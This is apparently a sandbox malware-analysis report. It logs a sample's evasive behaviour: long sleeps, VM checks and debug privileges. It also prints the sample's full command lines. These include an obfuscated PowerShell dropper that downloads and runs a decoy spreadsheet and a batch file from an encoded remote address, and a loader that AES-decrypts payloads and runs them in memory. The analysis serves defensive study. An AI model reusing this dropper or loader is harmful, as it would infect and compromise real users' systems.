Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4538	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3577	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5288	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 852	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 814	Jump to behavior
Source: C:\Windows\splwow64.exe	Window / User API: threadDelayed 612

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep count: 5288 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 852 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep count: 814 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep count: 270 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7956	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000

Source: mshta.exe, 00000000.00000003.1787650198.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2966146591.000002AB2DC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2967560916.000002AB2F05C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1781803953.0000000007B28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

